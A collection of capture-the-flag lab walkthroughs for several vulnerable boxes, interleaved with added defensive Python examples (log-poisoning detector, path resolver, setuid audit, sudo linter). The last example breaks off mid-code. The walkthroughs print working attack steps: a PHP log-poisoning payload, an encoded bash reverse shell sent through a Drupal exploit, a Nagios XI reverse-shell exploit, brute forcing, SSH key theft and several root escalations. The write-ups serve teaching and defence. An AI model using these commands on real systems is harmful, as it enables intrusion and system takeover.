
Solstice

┌──(root㉿G)-[/home/kali]
└─# nmap -sS -Pn 192.168.178.72 -p- -T5
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-21 20:27 CST
Warning: 192.168.178.72 giving up on port because retransmission cap hit (2).
Nmap scan report for 192.168.178.72
Host is up (0.078s latency).
Not shown: 64952 closed tcp ports (reset), 574 filtered tcp ports (no-response)
PORT      STATE SERVICE
21/tcp    open  ftp
22/tcp    open  ssh
25/tcp    open  smtp
80/tcp    open  http
2121/tcp  open  ccproxy-ftp
3128/tcp  open  squid-http
8593/tcp  open  unknown
54787/tcp open  unknown
62524/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 428.63 seconds

Several services are unidentified, so I ran more detailed service detection against those ports.

┌──(root㉿G)-[/home/kali]
└─# nmap -sS -Pn 192.168.178.72 -p21,22,25,80,2121,3128,8593,54787,62524 -T5 -sC -sV
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-21 20:44 CST
Nmap scan report for 192.168.178.72
Host is up (0.080s latency).

PORT      STATE SERVICE    VERSION
21/tcp    open  ftp        pyftpdlib 1.5.6
| ftp-syst:
|   STAT:
| FTP server status:
|  Connected to: 192.168.178.72:21
|  Waiting for username.
|  TYPE: ASCII; STRUcture: File; MODE: Stream
|  Data connection closed.
|_End of status.
22/tcp    open  ssh        OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
|   2048 5b:a7:37:fd:55:6c:f8:ea:03:f5:10:bc:94:32:07:18 (RSA)
|   256 ab:da:6a:6f:97:3f:b2:70:3e:6c:2b:4b:0c:b7:f6:4c (ECDSA)
|_  256 ae:29:d4:e3:46:a1:b1:52:27:83:8f:8f:b0:c4:36:d1 (ED25519)
25/tcp    open  smtp       Exim smtpd 4.92
| smtp-commands: solstice Hello nmap.scanme.org [192.168.45.199], SIZE 52428800, 8BITMIME, PIPELINING, CHUNKING, PRDR, HELP
|_ Commands supported: AUTH HELO EHLO MAIL RCPT DATA BDAT NOOP QUIT RSET HELP
80/tcp    open  http       Apache httpd 2.4.38 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.38 (Debian)
2121/tcp  open  ftp        pyftpdlib 1.5.6
| ftp-syst:
|   STAT:
| FTP server status:
|  Connected to: 192.168.178.72:2121
|  Waiting for username.
|  TYPE: ASCII; STRUcture: File; MODE: Stream
|  Data connection closed.
|_End of status.
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drws------   2 www-data www-data     4096 Jun 18  2020 pub
3128/tcp  open  http-proxy Squid http proxy 4.6
|_http-title: ERROR: The requested URL could not be retrieved
|_http-server-header: squid/4.6
8593/tcp  open  http       PHP cli server 5.5 or later (PHP 7.3.14-1)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
54787/tcp open  http       PHP cli server 5.5 or later (PHP 7.3.14-1)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
62524/tcp open  ftp        FreeFloat ftpd 1.00
Service Info: Host: solstice; OSs: Linux, Windows; CPE: cpe:/o:linux:linux_kernel, cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 55.86 seconds

The site on port 80 has nothing worth attacking; the site on port 8593 can be taken from LFI to RCE.

While testing, /var/log/apache2/access.log turned out to be readable through the LFI, so I modified the request to inject the PHP code <?php echo system($_GET['cmd']); ?> into the log (log poisoning).

Box problems.
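The defensive side of the log-poisoning trick above is that the attacker's PHP open tag has to land in a client-controlled log field (request line, Referer or User-Agent) before the LFI includes the file. The detector below, an added example that is not code from the page (the same idea applies to the SSH-log poisoning on Ha-natraj later), parses Apache combined-format lines and flags both halves of the attack: a PHP tag in a logged field, and traversal sequences or log paths in the request. The lines in SAMPLE_LOG are constructed, and the ?page= parameter name is an assumption.

```python
"""Spot PHP log-poisoning attempts in Apache access logs.

Added example for the Solstice writeup; not code from the page. The log lines
in SAMPLE_LOG are constructed and the '?page=' parameter name is an assumption.
"""
import re
from typing import Dict, List, Tuple

# Apache "combined" LogFormat: %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i"
COMBINED_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>[^"]*)" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)
# A PHP open tag in any client-controlled field turns the log file into
# executable code the moment an LFI includes it.
PHP_TAG_RE = re.compile(r'<\?(?:php\b|=)', re.IGNORECASE)
# The LFI half of the attack: traversal sequences or log/proc paths in the request.
LFI_HINT_RE = re.compile(r'\.\./|/var/log/|/etc/passwd|/proc/self/', re.IGNORECASE)

# Constructed sample lines (not captured from the box).
SAMPLE_LOG = [
    '192.168.45.199 - - [21/Sep/2024:20:50:01 +0800] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '192.168.45.199 - - [21/Sep/2024:20:50:09 +0800] "GET /index.php?page=../../../../var/log/apache2/access.log HTTP/1.1" 200 9031 "-" "Mozilla/5.0"',
    '192.168.45.199 - - [21/Sep/2024:20:50:15 +0800] "GET / HTTP/1.1" 200 512 "-" "<?php echo system($_GET[\'cmd\']); ?>"',
]


def parse_line(line: str) -> Dict[str, str]:
    """Split one combined-format line into fields; empty dict if it does not parse."""
    m = COMBINED_RE.match(line.rstrip("\n"))
    return m.groupdict() if m else {}


def classify_line(line: str) -> List[str]:
    """Reasons this line is suspicious; an empty list means nothing was found."""
    fields = parse_line(line)
    if not fields:
        return ["unparsable line"]
    reasons = []
    for name in ("request", "referer", "agent"):
        if PHP_TAG_RE.search(fields[name]):
            reasons.append(f"php tag in {name}")
    if LFI_HINT_RE.search(fields["request"]):
        reasons.append("traversal or log path in request")
    return reasons


def scan(lines: List[str]) -> List[Tuple[int, str, List[str]]]:
    """Return (line number, client address, reasons) for every flagged line."""
    hits = []
    for lineno, line in enumerate(lines, 1):
        reasons = classify_line(line)
        if reasons:
            hits.append((lineno, parse_line(line).get("client", "?"), reasons))
    return hits


if __name__ == "__main__":
    for lineno, client, reasons in scan(SAMPLE_LOG):
        print(f"line {lineno} from {client}: {', '.join(reasons)}")
```

A poisoned line and a traversal request from the same client within a short window is the pairing worth alerting on; either alone is noisy but still worth logging. The real fix on the server is the include itself: never pass user input to include(), and keep the web user without read access to the log directory.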

Inclusiveness

Ports 21, 22 and 80 are open, and FTP allows anonymous login.

┌──(root㉿G)-[/tmp]
└─# nmap -sS -Pn -sC 192.168.243.14 --top-ports=15 -T5 -sV
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-16 20:58 CST
Nmap scan report for 192.168.243.14
Host is up (0.078s latency).

PORT     STATE  SERVICE       VERSION
21/tcp   open   ftp           vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxrwxrwx    2 0        0            4096 Feb 08  2020 pub [NSE: writeable]
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to ::ffff:192.168.45.154
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp   open   ssh           OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey:
|   2048 06:1b:a3:92:83:a5:7a:15:bd:40:6e:0c:8d:98:27:7b (RSA)
|   256 cb:38:83:26:1a:9f:d3:5d:d3:fe:9b:a1:d3:bc:ab:2c (ECDSA)
|_  256 65:54:fc:2d:12:ac:e1:84:78:3e:00:23:fb:e4:c9:ee (ED25519)
23/tcp   closed telnet
25/tcp   closed smtp
53/tcp   closed domain
80/tcp   open   http          Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Apache2 Debian Default Page: It works
110/tcp  closed pop3
135/tcp  closed msrpc
139/tcp  closed netbios-ssn
143/tcp  closed imap
443/tcp  closed https
445/tcp  closed microsoft-ds
3306/tcp closed mysql
3389/tcp closed ms-wbt-server
8080/tcp closed http-proxy
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.70 seconds

After logging in there are no files, only one directory, but it turns out to be writable, so we can upload files here.

┌──(kali㉿G)-[/tmp]
└─$ ftp Anonymous@192.168.243.14
Connected to 192.168.243.14.
220 (vsFTPd 3.0.3)
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -al
229 Entering Extended Passive Mode (|||13394|)
150 Here comes the directory listing.
drwxr-xr-x    3 0        0            4096 Feb 08  2020 .
drwxr-xr-x    3 0        0            4096 Feb 08  2020 ..
drwxrwxrwx    2 0        0            4096 Feb 08  2020 pub
226 Directory send OK.
ftp> cd pub
250 Directory successfully changed.
ftp> ls -al
229 Entering Extended Passive Mode (|||17063|)
150 Here comes the directory listing.
drwxrwxrwx    2 0        0            4096 Feb 08  2020 .
drwxr-xr-x    3 0        0            4096 Feb 08  2020 ..
226 Directory send OK.
ftp>                                                                  

On the web side I found the /manual directory.

image

Nothing else looked useful, so I checked /robots.txt; the site answers "You are not a search engine! You can't read my robots.txt!". Requesting it with a search-engine User-Agent reveals the directory we are after.

┌──(kali㉿G)-[/tmp]
└─$ curl http://192.168.243.14/robots.txt --user-agent GoogleBot
User-agent: *
Disallow: /secret_information/

The site's ?lang= parameter is vulnerable to LFI.

image

I uploaded php-reverse-shell.php over FTP and included /var/ftp/pub/php-reverse-shell.php through the LFI to get RCE.

image
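The ?lang= include above fails because a user-supplied value is joined onto a path and handed to include() with no check. The added example below is not code from the box; it shows the two hardened patterns in Python: an allowlist that maps a language code to a known file (preferred, because in PHP include() also accepts wrappers such as php:// that no path check catches), and a containment check for cases where an allowlist is impractical. The language directory and code list are assumptions.

```python
"""Safe resolution of a user-supplied 'lang' value to a file under a fixed directory.

Added example for the Inclusiveness writeup; not code from the box. LANG_DIR and
ALLOWED are assumptions for the demonstration.
"""
import os
import re
from typing import Callable

LANG_DIR = "/var/www/html/lang"   # assumed location of the language files
ALLOWED = {"en", "es", "fr"}      # assumed allowlist of known language codes
CODE_RE = re.compile(r"^[a-z]{2}$")


class UnsafePath(ValueError):
    """Raised when a user value would select anything outside the intended files."""


def resolve_lang(user_value: str, base: str = LANG_DIR) -> str:
    """Allowlist approach: only a known two-letter code maps to a file.

    No part of the user value reaches the filesystem path except the code itself,
    so traversal, absolute paths and stream wrappers are all rejected up front."""
    if not CODE_RE.fullmatch(user_value) or user_value not in ALLOWED:
        raise UnsafePath(f"unknown language: {user_value!r}")
    return os.path.join(base, user_value + ".php")


def resolve_under(base: str, user_value: str) -> str:
    """Containment approach for when an allowlist is impractical.

    Normalise the joined path and require it to stay inside base. normpath does
    not follow symlinks; on a live filesystem use os.path.realpath as well so a
    symlink inside base cannot point outside it."""
    if "\x00" in user_value:
        raise UnsafePath("NUL byte in path")
    base_norm = os.path.normpath(base)
    # os.path.join discards base when user_value is absolute, which is exactly
    # what lets '/var/ftp/pub/...' escape; the commonpath check catches that too.
    candidate = os.path.normpath(os.path.join(base_norm, user_value))
    if candidate == base_norm or os.path.commonpath([base_norm, candidate]) != base_norm:
        raise UnsafePath(f"path escapes base: {user_value!r}")
    return candidate


def is_rejected(fn: Callable[..., str], *args: str) -> bool:
    """True if fn raises UnsafePath for args (convenience for checks below)."""
    try:
        fn(*args)
    except UnsafePath:
        return True
    return False


if __name__ == "__main__":
    print(resolve_lang("en"))
    for bad in ("../../etc/passwd", "/var/ftp/pub/php-reverse-shell.php"):
        print(bad, "->", "rejected" if is_rejected(resolve_under, LANG_DIR, bad) else "accepted")
```

On the PHP side the equivalent is a switch or in_array() over the known codes, plus allow_url_include=Off so remote and wrapper includes are off the table regardless of the parameter.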

For privilege escalation, there are two odd files in tom's home directory:

-rwsr-xr-x  1 root root 16976 Feb  8  2020 rootshell
-rw-r--r--  1 tom  tom    448 Feb  8  2020 rootshell.c
www-data@inclusiveness:/home/tom$ cat rootshell.c
cat rootshell.c
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>

int main() {

    printf("checking if you are tom...\n");
    FILE* f = popen("whoami", "r");

    char user[80];
    fgets(user, 80, f);

    printf("you are: %s\n", user);
    //printf("your euid is: %i\n", geteuid());

    if (strncmp(user, "tom", 3) == 0) {
        printf("access granted.\n");
        setuid(geteuid());
        execlp("sh", "sh", (char *) 0);
    }
}

www-data@inclusiveness:/home/tom$                             

Because the binary runs whoami through the PATH, changing the PATH environment variable lets us replace whoami with anything we want.

www-data@inclusiveness:/home/tom$ echo 'echo tom' > whoami
echo 'echo tom' > whoami
bash: whoami: Permission denied
www-data@inclusiveness:/home/tom$ cd /tmp
cd /tmp
www-data@inclusiveness:/tmp$ echo "echo tom" > whoami
echo "echo tom" > whoami
www-data@inclusiveness:/tmp$ chmod +x whoami
chmod +x whoami
www-data@inclusiveness:/tmp$ export PATH=/tmp:$PATH
export PATH=/tmp:$PATH
www-data@inclusiveness:/tmp$ /home/tom/rootshell
/home/tom/rootshell
checking if you are tom...
you are: tom

access granted.
# cat /root/proof.txt
cat /root/proof.txt
8d3f0387251383abb846c12482691bbb
# ^C

EvilBox-One

Ports 22 and 80 are open. This box really tests fuzzing skills: the website is the Apache2 Debian default page. I first found the /secret directory, then fuzzed out evil.php.

┌──(kali㉿G)-[/tmp]
└─$ gobuster dir -u http://192.168.155.212/secret -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,aspx
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.155.212/secret
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              html,aspx,php
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.html                (Status: 403) [Size: 280]
/index.html           (Status: 200) [Size: 4]
/.php                 (Status: 403) [Size: 280]
/evil.php             (Status: 200) [Size: 0]
Progress: 55845 / 882244 (6.33%)^C
[!] Keyboard interrupt detected, terminating.
Progress: 55875 / 882244 (6.33%)
===============================================================
Finished
===============================================================

But the page is still blank.

image

Continuing to fuzz, I found the parameter name: command.

┌──(kali㉿G)-[~]
└─$ ffuf -u http://192.168.155.212/secret/evil.php?FUZZ=/etc/passwd -w /usr/share/wordlists/dirb/big.txt -fw 1

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://192.168.155.212/secret/evil.php?FUZZ=/etc/passwd
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirb/big.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response words: 1
________________________________________________

command                 [Status: 200, Size: 1398, Words: 13, Lines: 27, Duration: 76ms]
:: Progress: [20469/20469] :: Job [1/1] :: 536 req/sec :: Duration: [0:00:47] :: Errors: 0 ::

Reading /etc/passwd reveals the user mowree, so I tried reading /home/mowree/.ssh/id_rsa.

┌──(kali㉿G)-[~]
└─$ curl http://192.168.155.212/secret/evil.php?command=/home/mowree/.ssh/id_rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,9FB14B3F3D04E90E
-----END RSA PRIVATE KEY-----

Logging in directly with the id_rsa fails; it needs a passphrase.

┌──(kali㉿G)-[/tmp]
└─$ ssh mowree@192.168.155.212 -i id_rsa
The authenticity of host '192.168.155.212 (192.168.155.212)' can't be established.
ED25519 key fingerprint is SHA256:0x3tf1iiGyqlMEM47ZSWSJ4hLBu7FeVaeaT2FxM7iq8.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.155.212' (ED25519) to the list of known hosts.
Enter passphrase for key 'id_rsa':

ssh2john plus john cracks the passphrase: unicorn.

┌──(kali㉿G)-[/tmp]
└─$ ssh2john id_rsa > hash

┌──(kali㉿G)-[/tmp]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
unicorn          (id_rsa)
1g 0:00:00:00 DONE (2024-09-15 17:55) 33.33g/s 42666p/s 42666c/s 42666C/s ramona..poohbear1
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

For privilege escalation, /etc/passwd is writable by us, so I simply set a new root password.

mowree@EvilBoxOne:~$ ls -al /etc/passwd
-rw-rw-rw- 1 root root 1398 ago 16  2021 /etc/passwd
mowree@EvilBoxOne:~$ openssl passwd root
9kQPB8avNoXCg

Open /etc/passwd in nano and change the root line to root:9kQPB8avNoXCg:0:0:root:/root:/bin/bash, then su root with the password root to get root.

mowree@EvilBoxOne:~$ su root
Contraseña:
root@EvilBoxOne:/home/mowree# cat /root/proof.txt
e4d485eacaf6c6d29c6fabec6c6f4968
root@EvilBoxOne:/home/mowree# exit
mowree@EvilBoxOne:~$ cerrar sesión
Connection to 192.168.155.212 closed.
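Two filesystem misconfigurations carried these boxes: the root-owned setuid rootshell on Inclusiveness (which should compare getuid() against tom's uid instead of parsing whoami output found via PATH) and the world-writable /etc/passwd here. The added example below is not code from either box; it is the audit a defender would run over a tree, written as a pure classification function over stat data (so it can be checked against the modes shown in the writeups) plus a walker that applies it. The expected-setuid allowlist and sensitive-file list are assumptions for a stock Debian host.

```python
"""Audit a tree for unexpected setuid/setgid binaries and world-writable sensitive files.

Added example for the Inclusiveness and EvilBox-One writeups; not code from the
boxes. EXPECTED_SUID and SENSITIVE are assumptions for a stock Debian system.
"""
import os
import stat
from typing import Iterable, List, Tuple

# Binaries normally setuid on Debian; anything else owned by root is worth a look.
EXPECTED_SUID = {
    "/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/su", "/bin/su", "/bin/mount",
    "/bin/umount", "/usr/bin/chsh", "/usr/bin/chfn", "/usr/bin/newgrp",
    "/usr/bin/gpasswd", "/bin/ping",
}
# Files that must never be writable by anyone but root.
SENSITIVE = {"/etc/passwd", "/etc/shadow", "/etc/sudoers", "/etc/group"}


def classify_file(path: str, mode: int, uid: int,
                  expected_suid: Iterable[str] = EXPECTED_SUID,
                  sensitive: Iterable[str] = SENSITIVE) -> List[str]:
    """Pure function over stat data (st_mode, st_uid), so it needs no real filesystem."""
    findings: List[str] = []
    if not stat.S_ISREG(mode):
        return findings
    if mode & stat.S_ISUID and uid == 0 and path not in expected_suid:
        findings.append("unexpected root setuid binary")
    if mode & stat.S_ISGID and path not in expected_suid:
        findings.append("unexpected setgid binary")
    if path in sensitive and mode & stat.S_IWOTH:
        findings.append("world-writable sensitive file")
    if mode & stat.S_ISUID and mode & stat.S_IWOTH:
        findings.append("world-writable setuid binary")
    return findings


def audit(root: str) -> List[Tuple[str, List[str]]]:
    """Walk root without following symlinks and return (path, findings) for flagged files."""
    results = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            full = os.path.join(dirpath, name)
            try:
                st = os.lstat(full)
            except OSError:
                continue  # vanished or unreadable; skip rather than abort the audit
            hits = classify_file(full, st.st_mode, st.st_uid)
            if hits:
                results.append((full, hits))
    return results


if __name__ == "__main__":
    # Modes as shown in the writeups: -rwsr-xr-x root rootshell, -rw-rw-rw- root /etc/passwd
    print(classify_file("/home/tom/rootshell", 0o104755, 0))
    print(classify_file("/etc/passwd", 0o100666, 0))
    for path, hits in audit("/usr/bin"):
        print(path, hits)
```

Run the walker from / on a schedule and diff its output against a known-good baseline; a new root setuid file or a permission change on /etc/passwd is a high-confidence signal. The walker uses lstat so a symlink pointing at a setuid binary is not double-counted.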

Monitoring

Ports 22, 25, 80 and 443 are open. The website is a Nagios XI page. Looking up the default username gives nagiosadmin, and trying the weak password admin logs in.

image

Its version, 5.6.0, has an exploitable RCE vulnerability, and the shell it gives is already root.

┌──(kali㉿G)-[/tmp]
└─$ php 47299 --host=192.168.171.136 --ssl=false --user=nagiosadmin --pass=admin --reverseip=192.168.45.191 --reverseport=4444
[+] Grabbing NSP from: http://192.168.171.136/nagiosxi/login.php
[+] Retrieved page contents from: http://192.168.171.136/nagiosxi/login.php
[+] Extracted NSP - value: cb269f55b1f8dd0d6fc3b4c6abfff7ac92037953dd514a37790a1366cf7eec12
[+] Attempting to login...
[+] Authentication success
[+] Checking we have admin rights...
[+] Admin access confirmed
[+] Grabbing NSP from: http://192.168.171.136/nagiosxi/admin/monitoringplugins.php
[+] Retrieved page contents from: http://192.168.171.136/nagiosxi/admin/monitoringplugins.php
[+] Extracted NSP - value: e67bb311cc6c45ea6faf1a151d04567485e3a1812c3e4d85118276e427d71300
[+] Uploading payload...
[+] Payload uploaded
[+] Triggering payload: if successful, a reverse shell will spawn at 192.168.45.191:4444
┌──(kali㉿G)-[/tmp]
└─$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.45.191] from (UNKNOWN) [192.168.171.136] 44100
bash: cannot set terminal process group (954): Inappropriate ioctl for device
bash: no job control in this shell                                               
root@ubuntu:/usr/local/nagiosxi/html/includes/components/profile# cat /root/proof.txt
0b1ad11445f29d8979aeea8a165c0da2

image

DC-1

Port scan first: ssh, http and rpc services are open. The website is Drupal, but CHANGELOG.txt is not accessible to check the version, so it came down to trial and error. I happened to run into a Drupal RCE in the XX exam, so I used the same exploit once more.

┌──(kali㉿G)-[/tmp]
└─$ python3 exploit.py http://192.168.157.193/ -c "echo c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC40NS4xNjgvNDQ0NCAwPiYx | base64 -d | bash"
============================================================================
|          DRUPAL 7 <= 7.57 REMOTE CODE EXECUTION (CVE-2018-7600)           |
|                              by pimps                                     |
=============================================================================

[*] Poisoning a form and including it in cache.
[*] Poisoned form ID: form-LMI8DwNIM7HoyAgcZyNaC7Nxt_a4-8CoiOScL1TnwbI
[*] Triggering exploit to execute: echo c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC40NS4xNjgvNDQ0NCAwPiYx | base64 -d | bash

After that, local.txt is obtained.
image

Then a simple SUID privilege escalation: find has the SUID bit, so it can spawn a root shell.
image

Pyexp

┌──(kali㉿G)-[/tmp]
└─$ hydra -l root -P /usr/share/wordlists/rockyou.txt 192.168.171.118 mysql
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-09-13 22:17:29
[INFO] Reduced number of tasks to 4 (mysql does not like many parallel connections)
[DATA] max 4 tasks per 1 server, overall 4 tasks, 14344399 login tries (l:1/p:14344399), ~3586100 tries per task
[DATA] attacking mysql://192.168.171.118:3306/
[STATUS] 344.00 tries/min, 344 tries in 00:01h, 14344055 to do in 694:58h, 4 active

[STATUS] 335.33 tries/min, 1006 tries in 00:03h, 14343393 to do in 712:54h, 4 active
[STATUS] 338.71 tries/min, 2371 tries in 00:07h, 14342028 to do in 705:43h, 4 active
[STATUS] 340.07 tries/min, 5101 tries in 00:15h, 14339298 to do in 702:47h, 4 active
[3306][mysql] host: 192.168.171.118   login: root   password: prettywoman
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-09-13 22:47:15

Found login root with password prettywoman.
After logging in to MySQL, I found the table contents:

┌──(kali㉿G)-[/tmp]
└─$ mysql -u root -h 192.168.171.118 -p --skip-ssl
Enter password:
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 7285
Server version: 10.3.23-MariaDB-0+deb10u1 Debian 10

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Support MariaDB developers by giving a star at https://github.com/MariaDB/server
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| data               |
| information_schema |
| mysql              |
| performance_schema |
+--------------------+
4 rows in set (0.081 sec)

MariaDB [(none)]> use data;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [data]> show tables;
+----------------+
| Tables_in_data |
+----------------+
| fernet         |
+----------------+
1 row in set (0.080 sec)

MariaDB [data]> select * from fernet;
+--------------------------------------------------------------------------------------------------------------------------+----------------------------------------------+
| cred                                                                                                                     | keyy                                         |
+--------------------------------------------------------------------------------------------------------------------------+----------------------------------------------+
| gAAAAABfMbX0bqWJTTdHKUYYG9U5Y6JGCpgEiLqmYIVlWB7t8gvsuayfhLOO_cHnJQF1_ibv14si1MbL7Dgt9Odk8mKHAXLhyHZplax0v02MMzh_z_eI7ys= | UJ5_V_b-TWKKyzlErA96f-9aEnQEfdjFbRKt8ULjdV0= |
+--------------------------------------------------------------------------------------------------------------------------+----------------------------------------------+
1 row in set (0.083 sec)

MariaDB [data]>

After some research, Fernet turns out to be a symmetric encryption scheme; I decrypted the value with an online tool:
image
lucy:wJ9"Lemdv9\[FEw-
After SSHing in, local.txt is obtained.

┌──(kali㉿G)-[~/Downloads]
└─$ ssh lucy@192.168.171.118 -p 1337
The authenticity of host '[192.168.171.118]:1337 ([192.168.171.118]:1337)' can't be established.
ED25519 key fingerprint is SHA256:K18aoM62L+/GHVzkZJScoh+S91IW1EPPvsc1K7UuVbE.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[192.168.171.118]:1337' (ED25519) to the list of known hosts.
lucy@192.168.171.118's password:
Linux pyexp 4.19.0-10-amd64 #1 SMP Debian 4.19.132-1 (2020-07-24) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
lucy@pyexp:~$ cat local.txt
.bash_history  .bash_logout   .bashrc        local.txt      .profile       user.txt
lucy@pyexp:~$ cat local.txt
879a9259b86d302aea312c4cdffc3929
lucy@pyexp:~$                     

Privilege escalation is easier here.
sudo -l shows (root) NOPASSWD: /usr/bin/python2 /opt/exp.py.
cat /opt/exp.py shows it obviously calls the dangerous function exec on user input, which is what I abused.

lucy@pyexp:~$ sudo -l
Matching Defaults entries for lucy on pyexp:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User lucy may run the following commands on pyexp:
    (root) NOPASSWD: /usr/bin/python2 /opt/exp.py
lucy@pyexp:~$ cat /opt/exp.py
uinput = raw_input('how are you?')
exec(uinput)

lucy@pyexp:~$ sudo /usr/bin/python2 /opt/exp.py
how are you?__import__('os').system('/bin/bash')
root@pyexp:/home/lucy# cat /root/proof.txt
a7cafa73b9d0bc4db658cc924bd33167
root@pyexp:/home/lucy#
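The sudo rule above is the real defect: a NOPASSWD rule pointing at an interpreter is only as safe as the script it runs, and exec() on raw_input() makes that script a root shell. The added example below is not code from the box; it is a small linter over `sudo -l` output that flags rules handing root to an interpreter or launcher, rules with wildcards in their arguments (the `/bin/nice /notes/*` rule on Potato later is the same class), and notes when no password is required. SAMPLE is the page's own sudo -l text plus two constructed rules; the LAUNCHERS set is an assumption and not exhaustive.

```python
"""Lint 'sudo -l' output for rules that hand out root to an interpreter or a wildcard.

Added example for the pyexp writeup; not code from the box. SAMPLE is the page's
sudo -l output plus two constructed rules; LAUNCHERS is an assumption.
"""
import posixpath
import re
from typing import Dict, List, Tuple

# "(runas) TAG: TAG: /path arg, /path2 arg" as printed by sudo -l
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+?)\s*$")

# Programs that execute whatever they are given, so the rule is only as safe as the
# arguments (and, for scripts, the script's contents and who can write it).
LAUNCHERS = {"python", "python2", "python3", "perl", "ruby", "php", "sh", "bash", "dash",
             "zsh", "node", "lua", "awk", "mawk", "gawk", "vim", "vi", "nano", "less",
             "more", "find", "env", "nice", "gdb", "strace"}

# Page's own output plus two constructed rules (the nice rule mirrors Potato).
SAMPLE = r"""Matching Defaults entries for lucy on pyexp:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User lucy may run the following commands on pyexp:
    (root) NOPASSWD: /usr/bin/python2 /opt/exp.py
    (root) NOPASSWD: /bin/nice /notes/*
    (root) /usr/sbin/reboot
"""


def parse_sudo_l(text: str) -> List[Dict]:
    """One dict per command from the 'may run the following commands' block."""
    rules, in_block = [], False
    for line in text.splitlines():
        if line.startswith("User ") and "may run" in line:
            in_block = True
            continue
        if not in_block:
            continue
        m = RULE_RE.match(line)
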